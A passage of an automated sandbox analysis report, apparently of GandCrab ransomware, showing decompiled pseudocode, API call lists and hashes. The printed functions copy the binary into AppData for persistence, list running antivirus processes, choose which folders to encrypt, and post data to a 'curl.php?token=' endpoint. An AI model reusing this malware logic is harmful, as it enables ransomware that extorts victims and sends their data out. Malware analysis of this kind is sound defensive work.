                                          • Part of subcall function 0F9D5060: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0F9D50C6
                                          • Part of subcall function 0F9D5060: Sleep.KERNEL32(000003E8), ref: 0F9D5103
                                          • Part of subcall function 0F9D5060: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F9D5111
                                          • Part of subcall function 0F9D5060: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F9D5121
                                          • Part of subcall function 0F9D5060: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F9D513D
                                          • Part of subcall function 0F9D5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D514E
                                          • Part of subcall function 0F9D5060: wsprintfW.USER32 ref: 0F9D5166
                                          • Part of subcall function 0F9D5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D5177
                                        • lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 0F9D54C5
                                        • VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 0F9D54E5
                                        • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F9D54FA
                                        • lstrcatA.KERNEL32(00000000,data=), ref: 0F9D5518
                                        • lstrcatA.KERNEL32(00000000,0F9D582E), ref: 0F9D551E
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5572
                                        • _memset.LIBCMT ref: 0F9D558D
                                        • lstrcpyW.KERNEL32 ref: 0F9D55A1
                                        • lstrlenW.KERNEL32(?), ref: 0F9D55B9
                                        • lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 0F9D55D9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 0F9D5636
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F9D5642
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0F9D564E
                                        • InternetCloseHandle.WININET(?), ref: 0F9D5658
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
                                        • String ID: POST$curl.php?token=$data=
                                        • API String ID: 186108914-1715678351
                                        • Opcode ID: 2fc6d720f85f85ef7cbfb3491f1c34f838d9b6364fb2842260e78d72e056fe1d
                                        • Instruction ID: d06921e8be3cc22626783e33e12396159bc72395faba6ac99d49abac49619247
                                        • Opcode Fuzzy Hash: 2fc6d720f85f85ef7cbfb3491f1c34f838d9b6364fb2842260e78d72e056fe1d
                                        • Instruction Fuzzy Hash: 9751F871D0130AABEB109BA4DC41FEEBB7CFF88301F648515FA44B2182DB786654CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114stringmemorythreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0F9D2AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0F9D8090(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0F9D8150( &_v20, lstrlenW( &_v20));
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0F9D8090(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0F9D2890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0F9D2960(_t57, _t75);
					L17:
					ExitThread(0);
				}
			}




























                                        0x0f9d2ad6
                                        0x0f9d2aea
                                        0x0f9d2af0
                                        0x0f9d2af4
                                        0x0f9d2af6
                                        0x0f9d2b00
                                        0x0f9d2b1c
                                        0x0f9d2b1e
                                        0x0f9d2b1e
                                        0x0f9d2b02
                                        0x0f9d2b02
                                        0x0f9d2b02
                                        0x0f9d2b08
                                        0x0f9d2b10
                                        0x0f9d2b12
                                        0x0f9d2b14
                                        0x0f9d2b14
                                        0x0f9d2b28
                                        0x0f9d2b2c
                                        0x0f9d2b38
                                        0x0f9d2b3e
                                        0x0f9d2b43
                                        0x0f9d2b48
                                        0x0f9d2b4a
                                        0x0f9d2b55
                                        0x0f9d2b62
                                        0x0f9d2b67
                                        0x0f9d2b6c
                                        0x0f9d2b75
                                        0x0f9d2b89
                                        0x0f9d2b8e
                                        0x0f9d2b9c
                                        0x0f9d2ba2
                                        0x0f9d2ba5
                                        0x0f9d2ba7
                                        0x0f9d2bac
                                        0x0f9d2bae
                                        0x0f9d2be4
                                        0x0f9d2bec
                                        0x0f9d2bf4
                                        0x0f9d2bf6
                                        0x0f9d2bfd
                                        0x0f9d2c02
                                        0x0f9d2c05
                                        0x0f9d2c07
                                        0x00000000
                                        0x00000000
                                        0x0f9d2c0f
                                        0x0f9d2c11
                                        0x0f9d2c16
                                        0x0f9d2c1d
                                        0x0f9d2c2c
                                        0x0f9d2c2c
                                        0x0f9d2c2c
                                        0x0f9d2c2e
                                        0x0f9d2c2e
                                        0x0f9d2c2f
                                        0x0f9d2c35
                                        0x0f9d2c3b
                                        0x00000000
                                        0x0f9d2c3d
                                        0x0f9d2c25
                                        0x0f9d2c2a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d2c2a
                                        0x0f9d2bb6
                                        0x0f9d2bb8
                                        0x0f9d2bbd
                                        0x0f9d2bc4
                                        0x0f9d2bd3
                                        0x0f9d2bd3
                                        0x0f9d2bd3
                                        0x0f9d2bd5
                                        0x0f9d2bd5
                                        0x00000000
                                        0x0f9d2bd5
                                        0x0f9d2bcc
                                        0x0f9d2bd1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d2b4c
                                        0x0f9d2b4c
                                        0x0f9d2c40
                                        0x0f9d2c40
                                        0x0f9d2c45
                                        0x0f9d2c47
                                        0x0f9d2c47

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F9D2AEA
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F9D2B2C
                                        • GetTempPathW.KERNEL32(00000100,00000000), ref: 0F9D2B38
                                        • lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F9D2B7D
                                          • Part of subcall function 0F9D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                          • Part of subcall function 0F9D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                          • Part of subcall function 0F9D8150: GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                          • Part of subcall function 0F9D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                          • Part of subcall function 0F9D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                          • Part of subcall function 0F9D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                          • Part of subcall function 0F9D8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F9D2B9C
                                        • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F9D2BE4
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D2BEC
                                        • lstrcatW.KERNEL32(00000000,.exe), ref: 0F9D2BF4
                                        • wsprintfW.USER32 ref: 0F9D2C35
                                        • ExitThread.KERNEL32 ref: 0F9D2C47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                        • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                        • API String ID: 139215849-2398311915
                                        • Opcode ID: 366790f4bff83f47b6e17e53c1da527aa04f55fc77392764d0bc2271c6cedcb7
                                        • Instruction ID: 5bfa645b322da78216cd0de30451d37a07bd8da579e1f2a9c4deb6fbb3366e35
                                        • Opcode Fuzzy Hash: 366790f4bff83f47b6e17e53c1da527aa04f55fc77392764d0bc2271c6cedcb7
                                        • Instruction Fuzzy Hash: 7741F5702053119BE310DF30DC49B6B7B9CAFC4715F248828B646972C3DABCE958CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7A10 Relevance: 25.6, APIs: 17, Instructions: 150memorystringprocessCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E0F9D7A10(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t49;
				WCHAR* _t56;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c;
					_t49 = CreateToolhelp32Snapshot(2, 0);
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						if(Process32FirstW(_t49) != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000);
						CloseHandle(_v20);
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000);
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}































                                        0x0f9d7a2d
                                        0x0f9d7a2f
                                        0x0f9d7a3d
                                        0x0f9d7a3f
                                        0x0f9d7a46
                                        0x0f9d7a4d
                                        0x0f9d7a54
                                        0x0f9d7a5b
                                        0x0f9d7a62
                                        0x0f9d7a69
                                        0x0f9d7a70
                                        0x0f9d7a77
                                        0x0f9d7a7e
                                        0x0f9d7a85
                                        0x0f9d7a8c
                                        0x0f9d7a93
                                        0x0f9d7a9a
                                        0x0f9d7aa3
                                        0x0f9d7aa5
                                        0x0f9d7aaa
                                        0x0f9d7ad4
                                        0x0f9d7ada
                                        0x0f9d7aac
                                        0x0f9d7ab0
                                        0x0f9d7ab6
                                        0x0f9d7abc
                                        0x0f9d7ac2
                                        0x0f9d7adf
                                        0x0f9d7ae1
                                        0x0f9d7ae3
                                        0x0f9d7ae6
                                        0x0f9d7ae9
                                        0x0f9d7aec
                                        0x0f9d7af7
                                        0x00000000
                                        0x0f9d7b00
                                        0x0f9d7b08
                                        0x0f9d7b10
                                        0x0f9d7b1f
                                        0x0f9d7b23
                                        0x00000000
                                        0x0f9d7b25
                                        0x0f9d7b25
                                        0x0f9d7b25
                                        0x0f9d7b87
                                        0x0f9d7b87
                                        0x0f9d7b96
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d7b96
                                        0x0f9d7b2e
                                        0x0f9d7b2f
                                        0x0f9d7b31
                                        0x0f9d7b38
                                        0x0f9d7b55
                                        0x0f9d7b5e
                                        0x0f9d7b3a
                                        0x0f9d7b3a
                                        0x0f9d7b47
                                        0x0f9d7b47
                                        0x0f9d7b60
                                        0x0f9d7b7e
                                        0x0f9d7b81
                                        0x0f9d7b84
                                        0x00000000
                                        0x0f9d7b84
                                        0x0f9d7ba7
                                        0x0f9d7bab
                                        0x0f9d7bad
                                        0x0f9d7bb3
                                        0x0f9d7bc0
                                        0x0f9d7bc0
                                        0x0f9d7bb3
                                        0x0f9d7bcb
                                        0x0f9d7bcb
                                        0x0f9d7bdb
                                        0x0f9d7be0
                                        0x0f9d7be6
                                        0x0f9d7beb
                                        0x0f9d7bf5
                                        0x0f9d7bf5
                                        0x0f9d7bff
                                        0x0f9d7ac4
                                        0x0f9d7acc
                                        0x00000000
                                        0x0f9d7acc
                                        0x0f9d7ac2

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0F9D7A2D
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F9D7AA1
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F9D7AB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7ACC
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F9D7AEF
                                        • lstrcmpiW.KERNEL32(0F9E033C,-00000024), ref: 0F9D7B15
                                        • Process32NextW.KERNEL32(?,?), ref: 0F9D7B8E
                                        • GetLastError.KERNEL32 ref: 0F9D7B98
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D7BB6
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D7BDB
                                        • CloseHandle.KERNEL32(?), ref: 0F9D7BE0
                                        • VirtualFree.KERNEL32(?,?,00008000), ref: 0F9D7BF5
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
                                        • String ID:
                                        • API String ID: 2470459410-0
                                        • Opcode ID: 1b39d51b24d8480b3ab4d190a72af685bd5cc9a29853e9dcce0d9426bf61c672
                                        • Instruction ID: d91eadc4ebab5028d79b61ab884f1f471c505cee8502c7aabc89bbb6d883896a
                                        • Opcode Fuzzy Hash: 1b39d51b24d8480b3ab4d190a72af685bd5cc9a29853e9dcce0d9426bf61c672
                                        • Instruction Fuzzy Hash: 6E51BE71A05218EBDB218FA4D848B9EBBB8FF85724F208059F500AB2D2D7B85954CF55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6640 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0F9D6640(void* __ecx) {
				void* _t10;
				intOrPtr* _t21;
				void* _t45;
				void* _t46;

				_t46 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0F9D8090(_t46, L"\\ProgramData\\") != 0 || E0F9D8090(_t46, L"\\Program Files\\") != 0 || E0F9D8090(_t46, L"\\Tor Browser\\") != 0 || E0F9D8090(_t46, L"Ransomware") != 0 || E0F9D8090(_t46, L"\\All Users\\") != 0 || E0F9D8090(_t46, L"\\Local Settings\\") != 0) {
					L16:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t10 = E0F9D8090(_t46, L":\\Windows\\");
					if(_t10 != 0) {
						goto L16;
					} else {
						_t21 = __imp__SHGetSpecialFolderPathW;
						_push(_t10);
						_push(0x2a);
						_push(_t45);
						_push(_t10);
						if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L16;
									}
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
						} else {
							goto L16;
						}
					}
				}
			}







                                        0x0f9d6651
                                        0x0f9d6660
                                        0x0f9d6669
                                        0x0f9d676c
                                        0x0f9d6775
                                        0x0f9d6780
                                        0x0f9d66d3
                                        0x0f9d66da
                                        0x0f9d66e1
                                        0x00000000
                                        0x0f9d66e7
                                        0x0f9d66e7
                                        0x0f9d66ed
                                        0x0f9d66ee
                                        0x0f9d66f0
                                        0x0f9d66f1
                                        0x0f9d66f6
                                        0x0f9d6705
                                        0x0f9d6707
                                        0x0f9d6709
                                        0x0f9d670a
                                        0x0f9d6710
                                        0x0f9d671f
                                        0x0f9d6721
                                        0x0f9d6723
                                        0x0f9d6724
                                        0x0f9d672a
                                        0x0f9d6739
                                        0x0f9d673b
                                        0x0f9d673d
                                        0x0f9d673e
                                        0x0f9d6744
                                        0x0f9d6760
                                        0x0f9d676b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d66f6
                                        0x0f9d66e1

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6653
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D66F2
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D670C
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6726
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6740
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6760
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6775
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                        • String ID: :\Windows\$Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
                                        • API String ID: 1363212851-2358141795
                                        • Opcode ID: 37cfdcb4eecc45faf3ac1ae2cc41a8a0902f3e6f99e1812a5e7fed6b1e8a32d4
                                        • Instruction ID: 63fb26e1ad6028de2f43eb3ec37fe6f1676d4bfc3e1055f10c589ee968b4916a
                                        • Opcode Fuzzy Hash: 37cfdcb4eecc45faf3ac1ae2cc41a8a0902f3e6f99e1812a5e7fed6b1e8a32d4
                                        • Instruction Fuzzy Hash: 5A312C2834071522F9A035B68E65B6F688E8BC1F95F74C415BB02DE2C3EF9DD9014699
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D5060 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 91memorystringsleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E0F9D5060() {
				WCHAR* _v8;
				intOrPtr _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v60;
				short _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xf9e04c0]");
				_v24 =  &_v80;
				asm("movdqu [ebp-0x4c], xmm0");
				_v20 =  &_v60;
				asm("movdqa xmm0, [0xf9e04d0]");
				_v64 = 0x6e;
				asm("movdqu [ebp-0x38], xmm0");
				_v44 = 0;
				_v40 = 0x646e6167;
				_v36 = 0x62617263;
				_v32 = 0x7469622e;
				_v28 = 0;
				_v16 =  &_v40;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x14));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0F9D4E90(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}




























                                        0x0f9d5066
                                        0x0f9d5076
                                        0x0f9d5081
                                        0x0f9d5086
                                        0x0f9d508c
                                        0x0f9d509b
                                        0x0f9d50a1
                                        0x0f9d50a6
                                        0x0f9d50aa
                                        0x0f9d50b1
                                        0x0f9d50b8
                                        0x0f9d50bf
                                        0x0f9d50c3
                                        0x0f9d50c6
                                        0x0f9d50cc
                                        0x0f9d50ce
                                        0x0f9d50d3
                                        0x0f9d50d9
                                        0x0f9d50db
                                        0x0f9d50e0
                                        0x0f9d50e2
                                        0x0f9d50e2
                                        0x0f9d50e6
                                        0x0f9d50e7
                                        0x0f9d50ed
                                        0x0f9d50f2
                                        0x0f9d50f4
                                        0x0f9d50f7
                                        0x0f9d50f7
                                        0x0f9d50fc
                                        0x0f9d5103
                                        0x0f9d5103
                                        0x0f9d512a
                                        0x0f9d512d
                                        0x0f9d512f
                                        0x0f9d5134
                                        0x0f9d513d
                                        0x0f9d5145
                                        0x00000000
                                        0x00000000
                                        0x0f9d514e
                                        0x0f9d5154
                                        0x0f9d5157
                                        0x0f9d5157
                                        0x0f9d515c
                                        0x0f9d5166
                                        0x0f9d5177
                                        0x0f9d517d
                                        0x0f9d517d
                                        0x0f9d5185

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0F9D50C6
                                        • Sleep.KERNEL32(000003E8), ref: 0F9D5103
                                        • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F9D5111
                                        • VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F9D5121
                                        • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F9D513D
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D514E
                                        • wsprintfW.USER32 ref: 0F9D5166
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D5177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
